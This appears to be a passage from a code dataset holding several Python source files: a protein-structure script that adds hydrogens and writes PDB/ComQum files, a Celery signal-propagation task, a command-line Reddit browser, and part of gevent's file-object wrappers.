[A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\n\n\n\n\n\n\ndef ad_CH2(pdb, res_num, alter, A1, A2, A3):\n# ad 2H as CH2 group to A3\n\n r = 1.095\n Ad = 109\n Dd= -121.5\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"1H\"+name\n name2 = \"2H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n return pdb\n\ndef ad_CH3(pdb, res_num,alter, A2, A3):\n# ad 3H as CH3 group to A3\n# for alt in range(len(alter)):\n# print(\"alter[alt]\",alter[alt])\n# com = check(pdb,res_num,alter[alt],A1, A2, A3, 1)\n# print(com)\n# if com == False:\n# return pdb\n# print( pdb[res_num])\n# print(\"A2\", A2)\n A1=find_A1(pdb,A3,A2)\n# print(\"A1\",A1)\n r = 1.095\n Ad = 109\n Dd = 180\n Dd1 = 60\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n adH3 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd1)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[0]+nam[1]\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n name3 = \"H3\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n pdb = add_to_pdb(pdb, A3, adH3, name3)\n return pdb\n\ndef add_to_pdb(pdb,old_atm,new_koord,new_nam):\n## ad a new deuterium atom to behind an existing atom in the pdb list\n atom=0\n new_nam=\"H\"\n for i in range(len(pdb)):\n for k in range(len(pdb[i])): \n# print(\"ALT\",alt)\n# atom=0\n# print(pdb[res_num][i][3])\n# print(pdb[res_num][i][2].strip())\n if pdb[i][k][2].strip()==old_atm[2].strip() and\\\n pdb[i][k][3].strip()==old_atm[3].strip() and\\\n pdb[i][k][5].strip()==old_atm[5].strip() and\\\n pdb[i][k][6]==old_atm[6]:\n atom=pdb[i][k]\n indice = k+1\n res_num=i\n\n if atom == 0:\n return pdb\n l_pdb=[]\n l_pdb.append(atom[0])\n l_pdb.append(atom[1])\n l_pdb.append(new_nam)\n l_pdb.append(atom[3])\n l_pdb.append(atom[4])\n l_pdb.append(atom[5])\n l_pdb.append(atom[6])\n l_pdb.append(atom[7])\n l_pdb.append(new_koord[0])\n l_pdb.append(new_koord[1])\n l_pdb.append(new_koord[2])\n l_pdb.append(atom[11])\n l_pdb.append(atom[12])\n l_pdb.append(atom[13])\n l_pdb.append(\"H\")\n l_pdb.append(\" \")\n# print(\"old_atom\",old_atm)\n# print(\"atom\",atom)\n# print(\"l_pdb\",l_pdb)\n# print(\"???????????????????????????????????????????\")\n pdb[res_num].insert(indice, l_pdb)\n# pdb[res_num].append(l_pdb)\n return pdb\n\n\n\ndef find_A1(pdb,A3,A2):\n# find atom bond to A2 to define dihedral to A3\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n bond_atoms=f_bond_atoms(pdb,A2)\n# print(bond_atoms)\n for i in range(len(bond_atoms)):\n if bond_atoms[i][2]!= A3[2]:\n A1=bond_atoms[i]\n\n\n return A1\n\ndef CAngle(x,y,z):\n# calculate angle between a,b,c in degree\n x1=[0,0,0]\n x2=[0,0,0]\n for i in range(len(x)):\n x1[i]=y[i]-x[i]\n x2[i]=y[i]-z[i]\n Cangle=C2Angle(x1,x2)\n return Cangle\ndef C2Angle(x,y):\n#Calculates the angle between x and y\n#Answer in degrees\n #Calculate the angle between x and y\n rtodeg = 57.2957795\n 
C2angle=(ScalPr(x,y)/(len3dvec(x)*len3dvec(y)))\n# print(\"C2angle=\",C2angle)\n if 0.999999999 <= C2angle <= 1.000000000001 :\n C2angle=0\n elif -0.999999999 >= C2angle >= -1.000000000001:\n C2angle=180\n else:\n C2angle=np.arccos(C2angle)*rtodeg\n return C2angle\ndef ScalPr(x,y):\n#calculate the scalar product\n pro= x[0]*y[0]+x[1]*y[1]+x[2]*y[2]\n return pro\n\n\ndef Cross(x1,x2):\n#Calculates the cross product x3 = x1 x x2\n x3 = [0,0,0]\n x3[0]=x1[1]*x2[2]-x2[1]*x1[2]\n x3[1]=x1[2]*x2[0]-x2[2]*x1[0]\n x3[2]=x1[0]*x2[1]-x2[0]*x1[1]\n return x3\n\ndef Normlz(xyz):\n# Normalise xyz \n temp = 1/len3dvec(xyz)\n for i in range(len(xyz)):\n xyz[i]=xyz[i]*temp\n\n return xyz\ndef ZeroVector():\n## creates ZeroVector\n zerov = np.array([0,0,0])\n return zerov\n\ndef CDihed(x,y,z,w):\n#Calculate the dihedral angle x-y-z-w\n#Answer in degrees between -180 and +180\n #Set v1=y-x, v2=z-y, v3=w-z\n v1=[0,0,0]\n v2=[0,0,0]\n v3=[0,0,0]\n for i in range(3):\n v1[i]=y[i]-x[i]\n v2[i]=z[i]-y[i]\n v3[i]=w[i]-z[i]\n\n #Calculate the normal vectors n1 and n2\n n1=Cross(v1,v2)\n n2=Cross(v2,v3)\n\n #Calculate the torsion angle;\n #The sign is determined by the sign of v1.n2\n CDihed=C2Angle(n1,n2)\n if ScalPr(v1,n2) < 0:\n CDihed=-CDihed\n return CDihed\n\n\ndef ZtoXYZ(axyz,bxyz,cxyz,R,Ad,Dd):\n#defines coordinates of 4th atom fro coordinates of 3 atoms distance\n#angel and dihedral \n dxyz = [0,0,0]\n rtodeg = 57.2957795\n\n ## first check if atoms are linear (of yes something is wrong)\n tangle=CAngle(axyz,bxyz,cxyz)\n if abs(tangle)<= 0.1 or 179.9<= abs(tangle) <= 180.0:\n print(\"The atoms are collinear\", tangle)\n sys.exit()\n\n # transforme vrom degree to rad\n A = Ad/rtodeg\n D = Dd/rtodeg\n\n ## Calculate the coordinates in a simple coordinate system\n dxyz[0] = (-R)* np.sin(A)*np.sin(D)\n dxyz[1] = R * np.cos(A)\n dxyz[2] = R * np.sin(A)*np.cos(D)\n b = np.sqrt(CDist2(bxyz,cxyz))\n ab1 = np.sqrt(CDist2(axyz,bxyz))\n ang = CAngle(axyz,bxyz,cxyz)/rtodeg\n a2 = b - np.cos(ang)*ab1\n a3 = np.sin(ang)*ab1\n a1 = 0.0000\n\n ## Now, atom D is transformed into the original coordinate system\n ## 1st rotation\n tv = np.array([0.00, b, 0.00])\n bcv = np.array([bxyz[0]-cxyz[0], bxyz[1]-cxyz[1],bxyz[2]-cxyz[2]])\n rv = Cross(tv, bcv)\n rv = Normlz(rv)\n rv = np.array([rv[0],rv[1],rv[2]])\n zerov = ZeroVector()\n phi = CAngle(tv,zerov,bcv)/rtodeg\n an = [0,0,0]\n an[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*a1+\\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*a2+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*a3\n\n an[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*a1+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*a2+\\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*a3\n\n an[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*a1+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*a2+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*a3\n\n dn = [0,0,0]\n dn[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*dxyz[0]+ \\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*dxyz[1]+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*dxyz[2]\n\n dn[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*dxyz[1]+ \\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*dxyz[2]\n\n dn[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*dxyz[1]+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n\n # 2nd rotation\n 
tv[0]=axyz[0]-cxyz[0]\n tv[1]=axyz[1]-cxyz[1]\n tv[2]=axyz[2]-cxyz[2]\n phi=CDihed(tv,bcv,zerov,an)/rtodeg\n bcv = Normlz(bcv)\n\n dn[0]=(bcv[0]*bcv[0]+(1-bcv[0])*(1+bcv[0])*np.cos(phi))*dxyz[0]+\\\n (bcv[0]*bcv[1]*(1-np.cos(phi))-bcv[2]*np.sin(phi)) *dxyz[1]+\\\n (bcv[0]*bcv[2]*(1-np.cos(phi))+bcv[1]*np.sin(phi)) *dxyz[2]\n\n dn[1]=(bcv[0]*bcv[1]*(1-np.cos(phi))+bcv[2]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[1]+(1-bcv[1])*(1+bcv[1])*np.cos(phi))*dxyz[1]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))-bcv[0]*np.sin(phi)) *dxyz[2]\n\n dn[2]=(bcv[0]*bcv[2]*(1-np.cos(phi))-bcv[1]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))+bcv[0]*np.sin(phi)) *dxyz[1]+\\\n (bcv[2]*bcv[2]+(1-bcv[2])*(1+bcv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n #Final translation\n dxyz[0]=dxyz[0]+cxyz[0]\n dxyz[1]=dxyz[1]+cxyz[1]\n dxyz[2]=dxyz[2]+cxyz[2]\n\n\n return dxyz\n\n\n\n\n\n\ndef f_bond_atoms(pdb,atom_qm):\n## find bondet atoms\n bond_atom=[]\n xyz=[atom_qm[8],atom_qm[9],atom_qm[10]]\n bond_atom=[]\n# print(\"xyz&&&\",xyz)\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n p2=[pdb[i][k][8],pdb[i][k][9],pdb[i][k][10]]\n dist=CDist2(xyz,p2)\n # print(dist)\n if 0.5< dist< 2:\n# print(dist)\n bond_atom.append(pdb[i][k])\n return bond_atom\n\n\n\ndef def_n_bonds(xyz,ele,bond_atoms):\n# defines how many atoms are bond to the central atom with bond order\n nr_bonds=0\n# print(\"xyz!!!\",xyz)\n for i in range(len(bond_atoms)):\n p2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n dist=CDist2(xyz,p2)\n l_ele=[ele,bond_atoms[i][14]]\n# print(\"dist\",dist)\n if l_ele[0]==\"C\":\n if l_ele[1]==\"C\":\n if 0.5 < dist < 1.25:\n nr_bonds=nr_bonds+3\n if 1.25<= dist <=1.37:\n nr_bonds=nr_bonds+2\n if 1.38<= dist<= 1.47:\n nr_bonds=nr_bonds+1.5\n if 1.48<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"O\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n if 1.33<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"N\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1.5\n if 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"N\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n elif 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"O\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n elif 1.32 < dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.29:\n nr_bonds=nr_bonds+1\n else:\n if 1.55< dist <=2.5:\n nr_bonds=nr_bonds+1\n if 0.5<= dist <= 1.55:\n nr_bonds=nr_bonds+2\n\n return nr_bonds\n\n\n\ndef CDist2(A,B):\n#calculate distance betweenn two points\n dist = len3dvec(twoP_to_vec(A, B))\n return dist\n\n\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\ndef twoP_to_vec(A,B):\n#creates vector between two points\n vec = np.array([B[0]-A[0], B[1]-A[1], B[2]-A[2]])\n\n return vec\n\n\ndef renumber_pdb(pdb):\n#renumbers pdb\n num=0\n for i in range(len(pdb)):\n for j in range(len(pdb[i])):\n num=num+1\n pdb[i][j][1]=num\n\n return pdb\n\n\n\ndef write_pdb(pdb,head, output):\n## wite out PDB file\n# res = open(output, \"w\")\n res= open(\"comqum.pdb\",\"w\")\n atm_nr=0\n for i in range(len(head)):\n res.write(head[i])\n# res.write(\"\\n\")\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n 
atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[i][k][0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:3s}'.format(str(pdb[i][k][2])))\n string = string + str('{:1}'.format(pdb[i][k][3]))\n string = string + str('{:3}'.format(pdb[i][k][4]))\n string = string + str('{:>2}'.format(pdb[i][k][5]))\n string = string + str('{:4}'.format(pdb[i][k][6]))\n string = string + str('{:1}'.format(pdb[i][k][7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[i][k][8]))\n string = string + str('{:8.3f}'.format(pdb[i][k][9]))\n string = string + str('{:8.3f}'.format(pdb[i][k][10]))\n string = string + str('{:6.2f}'.format(pdb[i][k][11]))\n string = string + str('{:6.2f}'.format(pdb[i][k][12]))\n string = string + str('{:>7}'.format(pdb[i][k][13]))\n string = string + str('{:>5}'.format(pdb[i][k][14]))\n\n\n string = string + \"\\n\"\n res.write(string)\n res.write(\"END\")\n#######################################################################################\n#processing data\nprint(input_pdb)\nprint(qm)\nqm_atom, qm_resi, qm_anam, qm_anum, qm_rnum= read_qm(qm)\nprint(\"Input\")\nprint(\"ATOM\",qm_atom)\nprint(\"RESI\",qm_resi)\nprint(\"ANUM\",qm_anum)\nprint(\"ANAM\",qm_anam)\nprint(\"RNUM\", qm_rnum)\n\norg_pdb, work_pdb, head = read_pdb(input_pdb)\n\n\npdb=atm_to_res(work_pdb)\n\natm_nr, atom_qm = assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb) \n\n\npdb=proto_qm(pdb, atom_qm, f_p)\npdb =renumber_pdb(pdb)\natm_nr, atom_qm = assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb) \n#print(\"atm_nr\",atm_nr)\n#for i in range(len(atom_qm)):\n# print(atom_qm[i])\n\ntrunc_nr, trunc_atm = find_truncation(atm_nr, atom_qm, pdb)\nf_all, f_qm, f_trunc = sum_list(atm_nr, atom_qm, trunc_nr, trunc_atm)\nprint(\" \")\nprint(\"f_all\",f_all)\n#print(\"f_qm\",f_qm)\nprint(\"f_trunc\",f_trunc)\nwrite_syst1(f_all,f_trunc)\nwrite_restart_anam(f_qm,work_pdb)\nwrite_rename(f_all,f_trunc,work_pdb)\nif f_p== True:\n write_pdb(pdb,head,input_pdb)\n\n\ntime_ende = time.time()\nprint(\"program ends normally after \"'{:5.3f}s'.format(time_ende-time_start),\" or \", '{:5.2f}min'.format((time_ende-time_start)/60))\n\n","sub_path":"gen_syst1.py","file_name":"gen_syst1.py","file_ext":"py","file_size_in_byte":42757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585540947","text":"from celery import shared_task\nfrom celery.utils.log import get_task_logger\n\nfrom django.dispatch.dispatcher import (\n _make_id,\n Signal,\n)\n\n\n@shared_task\ndef propagate_signal(self, sender, **named):\n \"\"\"\n Send signal from sender to all connected receivers catching errors.\n\n Arguments:\n\n sender The sender of the signal. Can be any python object\n (normally one registered with a connect if you\n actually want something to occur).\n\n named\n Named arguments which will be passed to receivers. These\n arguments must be a subset of the argument names defined in\n providing_args.\n\n Return a list of tuple pairs [(receiver, response), ... ]. 
May raise\n DispatcherKeyError.\n\n If any receiver raises an error (specifically any subclass of\n Exception), the error instance is returned as the result for that\n receiver.\n \"\"\"\n\n logger = get_task_logger(__name__)\n logger.info(\"START propagate_signal\")\n logger.info(self)\n logger.info(sender)\n logger.info(_make_id(sender))\n logger.info(self._live_receivers(_make_id(sender)))\n \n # Call each receiver with whatever arguments it can accept.\n for receiver in self._live_receivers(_make_id(sender)):\n try:\n logger.info(\"START Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n receiver(signal=self, sender=sender, **named)\n logger.info(\"END Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n except Exception as ex:\n logger.info(\"EXCEPT START Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n logger.error(ex)\n logger.info(\"EXCEPT END Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n \n logger.info(\"END propagate_signal\")\n\n\n@shared_task\ndef call_receiver(receiver, self, sender, **named):\n receiver(signal=self, sender=sender, **named)\n \n","sub_path":"src/async_signals/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297417116","text":"# https://www.reddit.com/r/askreddit.json\n# https://shahriar.svbtle.com/underscores-in-python\n# Browse Reddit through your command line! You filthy nerd\n# Personal due date: Sunday Oct 16th? (idk)\n# Index +-> Post ~> PostContent +-> CommentThread\nimport requests\nimport json\nfrom pdb import set_trace as st\n\n\nUSER_AGENT = {'User-agent': '/u/aRealUser'}\nCOUNT = 0\n\n\nclass Index(object):\n \"\"\"Class that converts a JSON response to Python container types\"\"\"\n # Eventually be able to SCP / tunnel images onto client disk\n def __init__(self, subreddit, page=0):\n self.subreddit = subreddit\n self.page = self._get_page(\n subreddit=subreddit,\n page=page\n )\n self.page_loads = json.loads(self.page.text)\n self.posts = self._get_posts()\n\n def _get_page(self, subreddit, page):\n url = \"https://www.reddit.com/r/{0}/.json?&limit=100\".format(\n subreddit\n )\n return requests.get(url=url, headers=USER_AGENT)\n\n def _get_nav(self, after, before):\n if after:\n nav_str = \"&after=\" + after\n # Definitely the most confusing \"human readable\" conditional ever\n elif before and not after:\n nav_str = \"&before=\" + before\n else:\n nav_str = ''\n\n return nav_str\n\n def _sub_exists(self, url):\n return bool(self.page_loads['data']['children'])\n\n def _get_posts(self):\n if self._sub_exists(self.subreddit):\n try:\n post_loads = self.page_loads['data']['children']\n except KeyError:\n raise KeyError(\"Expected page_loads with ['data'] and ['children'] keys, got: {}\".format(self.page_loads))\n posts = []\n for info in post_loads:\n posts.append(Post(kwargs=info))\n\n else:\n raise KeyError(\"Sub does not exist!\")\n return posts\n\n\nclass Post(object):\n \"\"\"\n Struct to hold post information\n ##TODO: Explicit member initializations\n \"\"\"\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs['kwargs']['data'])\n\n def get_post_content(self):\n return PostContent(\n subreddit=self.subreddit,\n post_id=self.id\n )\n\n def __repr__(self):\n return self.title\n\n\nclass PostContent(object):\n \"\"\"\n Called when a user decides they 
want to view a particular post.\n Struct to hold Comment Threads and post content (text/links)\n \"\"\"\n def __init__(self, subreddit, post_id):\n self.page = self._get_page(subreddit, post_id)\n self.page_loads = json.loads(self.page.text)\n self.comments = self._get_comments()\n\n def _get_page(self, subreddit, post_id):\n url = \"https://www.reddit.com/r/{0}/comments/{1}.json\".format(subreddit, post_id)\n return requests.get(url=url, headers=USER_AGENT)\n\n def _get_comments(self):\n comment_json = self.page_loads[1]['data']['children']\n comments = []\n for thread in comment_json:\n if self.is_comment(thread):\n comments.append(CommentThread(comment_loads=thread['data']))\n\n return comments\n\n @staticmethod\n def is_comment(comment_json):\n return comment_json['kind'] != \"more\"\n\n\nclass CommentThread(object):\n \"\"\"\n Struct with comment and comment-reply data.\n Users will at first only see content 3 replies deep\n and 5 replies down.\n \"\"\"\n def __init__(self, comment_loads):\n self.author = comment_loads['author']\n self.body = comment_loads['body']\n self.gilded = comment_loads['gilded']\n self.created = comment_loads['created']\n self.score = comment_loads['score']\n self.comment_loads = comment_loads\n self.replies = self._get_replies(comment_loads['replies'])\n\n def _get_replies(self, replies):\n \"\"\"\n An accidentally recursive function to get replies and THOSE reply's replies\n and then THOSE reply's replies and then THOSE . . .\n \"\"\"\n reply_l = []\n\n if not replies:\n return reply_l\n\n for thread in replies['data']['children']:\n if PostContent.is_comment(thread) and self._has_replies(thread):\n comment_loads = thread['data']\n reply_l.append(CommentThread(comment_loads))\n\n return reply_l\n\n def _has_replies(self, thread):\n \"\"\"Checks if a thread has children or replies.\"\"\"\n return bool(thread['data']['replies'])\n\n def tree_repr(self, followed=False, depth=0):\n if depth == 0:\n print('~' * 60)\n print(self.body)\n print('~' * 60)\n\n depth += 1\n\n for reply in self.replies:\n print(('- ' * depth) + reply.body)\n\n # Pursue the next set of replies\n reply.tree_repr(followed=True, depth=depth)\n","sub_path":"Classes/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162983366","text":"from __future__ import absolute_import, print_function, division\n\ntry:\n from errno import EBADF\nexcept ImportError:\n EBADF = 9\n\nimport os\nfrom io import TextIOWrapper\nimport functools\nimport sys\n\n\nfrom gevent.hub import _get_hub_noargs as get_hub\nfrom gevent._compat import integer_types\nfrom gevent._compat import reraise\nfrom gevent.lock import Semaphore, DummySemaphore\n\nclass cancel_wait_ex(IOError):\n\n def __init__(self):\n super(cancel_wait_ex, self).__init__(\n EBADF, 'File descriptor was closed in another greenlet')\n\n\nclass FileObjectClosed(IOError):\n\n def __init__(self):\n super(FileObjectClosed, self).__init__(\n EBADF, 'Bad file descriptor (FileObject was closed)')\n\nclass FileObjectBase(object):\n \"\"\"\n Internal base class to ensure a level of consistency\n between FileObjectPosix and FileObjectThread\n \"\"\"\n\n # List of methods we delegate to the wrapping IO object, if they\n # implement them and we do not.\n _delegate_methods = (\n # General methods\n 'flush',\n 'fileno',\n 'writable',\n 'readable',\n 'seek',\n 'seekable',\n 'tell',\n\n # Read\n 'read',\n 'readline',\n 'readlines',\n 
'read1',\n\n # Write\n 'write',\n 'writelines',\n 'truncate',\n )\n\n\n # Whether we are translating universal newlines or not.\n _translate = False\n\n _translate_encoding = None\n _translate_errors = None\n\n def __init__(self, io, closefd):\n \"\"\"\n :param io: An io.IOBase-like object.\n \"\"\"\n self._io = io\n # We don't actually use this property ourself, but we save it (and\n # pass it along) for compatibility.\n self._close = closefd\n\n if self._translate:\n # This automatically handles delegation by assigning to\n # self.io\n self.translate_newlines(None, self._translate_encoding, self._translate_errors)\n else:\n self._do_delegate_methods()\n\n\n io = property(lambda s: s._io,\n # Historically we either hand-wrote all the delegation methods\n # to use self.io, or we simply used __getattr__ to look them up at\n # runtime. This meant people could change the io attribute on the fly\n # and it would mostly work (subprocess.py used to do that). We don't recommend\n # that, but we still support it.\n lambda s, nv: setattr(s, '_io', nv) or s._do_delegate_methods())\n\n def _do_delegate_methods(self):\n for meth_name in self._delegate_methods:\n meth = getattr(self._io, meth_name, None)\n implemented_by_class = hasattr(type(self), meth_name)\n if meth and not implemented_by_class:\n setattr(self, meth_name, self._wrap_method(meth))\n elif hasattr(self, meth_name) and not implemented_by_class:\n delattr(self, meth_name)\n\n def _wrap_method(self, method):\n \"\"\"\n Wrap a method we're copying into our dictionary from the underlying\n io object to do something special or different, if necessary.\n \"\"\"\n return method\n\n def translate_newlines(self, mode, *text_args, **text_kwargs):\n wrapper = TextIOWrapper(self._io, *text_args, **text_kwargs)\n if mode:\n wrapper.mode = mode\n self.io = wrapper\n self._translate = True\n\n @property\n def closed(self):\n \"\"\"True if the file is closed\"\"\"\n return self._io is None\n\n def close(self):\n if self._io is None:\n return\n\n io = self._io\n self._io = None\n self._do_close(io, self._close)\n\n def _do_close(self, fobj, closefd):\n raise NotImplementedError()\n\n def __getattr__(self, name):\n if self._io is None:\n raise FileObjectClosed()\n return getattr(self._io, name)\n\n def __repr__(self):\n return '<%s _fobj=%r%s>' % (self.__class__.__name__, self.io, self._extra_repr())\n\n def _extra_repr(self):\n return ''\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.close()\n\nclass FileObjectBlock(FileObjectBase):\n\n def __init__(self, fobj, *args, **kwargs):\n closefd = kwargs.pop('close', True)\n if kwargs:\n raise TypeError('Unexpected arguments: %r' % kwargs.keys())\n if isinstance(fobj, integer_types):\n if not closefd:\n # we cannot do this, since fdopen object will close the descriptor\n raise TypeError('FileObjectBlock does not support close=False on an fd.')\n fobj = os.fdopen(fobj, *args)\n super(FileObjectBlock, self).__init__(fobj, closefd)\n\n def _do_close(self, fobj, closefd):\n fobj.close()\n\nclass FileObjectThread(FileObjectBase):\n \"\"\"\n A file-like object wrapping another file-like object, performing all blocking\n operations on that object in a background thread.\n\n .. caution::\n Attempting to change the threadpool or lock of an existing FileObjectThread\n has undefined consequences.\n\n .. versionchanged:: 1.1b1\n The file object is closed using the threadpool. 
Note that whether or\n not this action is synchronous or asynchronous is not documented.\n\n \"\"\"\n\n def __init__(self, fobj, mode=None, bufsize=-1, close=True, threadpool=None, lock=True):\n \"\"\"\n :param fobj: The underlying file-like object to wrap, or an integer fileno\n that will be pass to :func:`os.fdopen` along with *mode* and *bufsize*.\n :keyword bool lock: If True (the default) then all operations will\n be performed one-by-one. Note that this does not guarantee that, if using\n this file object from multiple threads/greenlets, operations will be performed\n in any particular order, only that no two operations will be attempted at the\n same time. You can also pass your own :class:`gevent.lock.Semaphore` to synchronize\n file operations with an external resource.\n :keyword bool close: If True (the default) then when this object is closed,\n the underlying object is closed as well.\n \"\"\"\n closefd = close\n self.threadpool = threadpool or get_hub().threadpool\n self.lock = lock\n if self.lock is True:\n self.lock = Semaphore()\n elif not self.lock:\n self.lock = DummySemaphore()\n if not hasattr(self.lock, '__enter__'):\n raise TypeError('Expected a Semaphore or boolean, got %r' % type(self.lock))\n if isinstance(fobj, integer_types):\n if not closefd:\n # we cannot do this, since fdopen object will close the descriptor\n raise TypeError('FileObjectThread does not support close=False on an fd.')\n if mode is None:\n assert bufsize == -1, \"If you use the default mode, you can't choose a bufsize\"\n fobj = os.fdopen(fobj)\n else:\n fobj = os.fdopen(fobj, mode, bufsize)\n\n self.__io_holder = [fobj] # signal for _wrap_method\n super(FileObjectThread, self).__init__(fobj, closefd)\n\n def _do_close(self, fobj, closefd):\n self.__io_holder[0] = None # for _wrap_method\n try:\n with self.lock:\n self.threadpool.apply(fobj.flush)\n finally:\n if closefd:\n # Note that we're not taking the lock; older code\n # did fobj.close() without going through the threadpool at all,\n # so acquiring the lock could potentially introduce deadlocks\n # that weren't present before. Avoiding the lock doesn't make\n # the existing race condition any worse.\n # We wrap the close in an exception handler and re-raise directly\n # to avoid the (common, expected) IOError from being logged by the pool\n def close(_fobj=fobj):\n try:\n _fobj.close()\n except: # pylint:disable=bare-except\n return sys.exc_info()\n finally:\n _fobj = None\n del fobj\n\n exc_info = self.threadpool.apply(close)\n del close\n\n if exc_info:\n reraise(*exc_info)\n\n def _do_delegate_methods(self):\n super(FileObjectThread, self)._do_delegate_methods()\n if not hasattr(self, 'read1') and 'r' in getattr(self._io, 'mode', ''):\n self.read1 = self.read\n self.__io_holder[0] = self._io\n\n def _extra_repr(self):\n return ' threadpool=%r' % (self.threadpool,)\n\n def __iter__(self):\n return self\n\n def next(self):\n line = self.readline()\n if line:\n return line\n raise StopIteration\n __next__ = next\n\n def _wrap_method(self, method):\n # NOTE: We are careful to avoid introducing a refcycle\n # within self. 
